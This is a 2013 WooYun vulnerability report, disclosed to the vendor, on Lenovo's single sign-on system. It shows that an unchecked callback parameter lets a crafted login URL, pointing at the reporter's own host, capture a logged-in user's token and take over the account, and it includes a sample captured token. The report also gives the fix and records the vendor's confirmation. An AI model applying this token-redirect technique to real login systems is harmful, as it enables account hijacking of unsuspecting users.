当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-034968

漏洞标题:联想安全问题二SSO统一认证系统缺陷可导致劫持用户帐号

相关厂商:联想

漏洞作者: VIP

提交时间:2013-08-22 11:41

修复时间:2013-10-06 11:41

公开时间:2013-10-06 11:41

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-08-22: 细节已通知厂商并且等待厂商处理中
2013-08-22: 厂商已经确认,细节仅向厂商公开
2013-09-01: 细节向核心白帽子及相关领域专家公开
2013-09-11: 细节向普通白帽子公开
2013-09-21: 细节向实习白帽子公开
2013-10-06: 细节向公众公开

简要描述:

联想SSO统一认证系统存在缺陷,如果用户是登录状态,那么一个img src就可以劫持用户的令牌.

详细说明:

联想的一个正常登录url如下:

https://passport.lenovo.com/wauthen/login?lenovoid.action=uilogin&lenovoid.source=browser:realm:chita.lps.lenovo.com&lenovoid.realm=chita.lps.lenovo.com&lenovoid.uinfo=username&lenovoid.cb=http://lefen.lenovo.com/lfb/lenovo.php?mod=login


最后的lenovoid.cb相当于是一个callback,会将令牌数据回调到上面的网址,那么,如果将这个回调地址改成我们的接收页面呢?

https://passport.lenovo.com/wauthen/login?lenovoid.action=uilogin&lenovoid.source=browser:realm:chita.lps.lenovo.com&lenovoid.realm=chita.lps.lenovo.com&lenovoid.uinfo=username&lenovoid.cb=http://vip.yupage.com/lenovo.php


用户在登录状态下访问这个页面是不需要任何点击就会自动授权,令牌就被我获取了。
利用方法:
先登录你的联想帐号,然后访问测试页面
http://vip.yupage.com/lenovo.htm
可以看到后台发起了一次请求,并且令牌被回调到了我的接收页面

s1.png


然后看看,已经收到了令牌

s2.png


然后拼接url,就能进别人的帐号了

http://www.lenovo.com.cn/?[令牌]

漏洞证明:

http://www.lenovo.com.cn/?lenovoid.action=uilogin&lenovoid.realm=chita.lps.lenovo.com&lenovoid.wust=ZAgAAAAAAAGE9MTAwMDk3NzU1MjgmYj0xJmM9MSZkPTEwMzAyJmU9QzgwM0VCRjVFMTAwRUNEREYxNkRDMTMwRjQ3OUE1RjExJmg9MTM3NzEzMjA1NjIyNSZpPTg2NDAwJnVzZXJuYW1lPXNtdHBfYWRtaW4lNDB5ZWFoLm5ldKfi7PMTpo0soIaXS27jiZo=&lenovoid.ctx=&lenovoid.lang=&lenovoid.vp=

修复方案:

对lenovoid.cb做限制,必须是lenovo.com.cn域下的域名

版权声明:转载请注明来源 VIP@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2013-08-22 15:41

厂商回复:

感谢VIP同学对联想安全做出的贡献!我们将立即评估与修复相关漏洞

最新状态:

暂无


漏洞评价:

评论

  1. 2013-12-26 09:52 | HackBraid 认证白帽子 ( 核心白帽子 | Rank:1545 漏洞数:260 | ...........................................)

    看完drops还是不懂什么原理。。。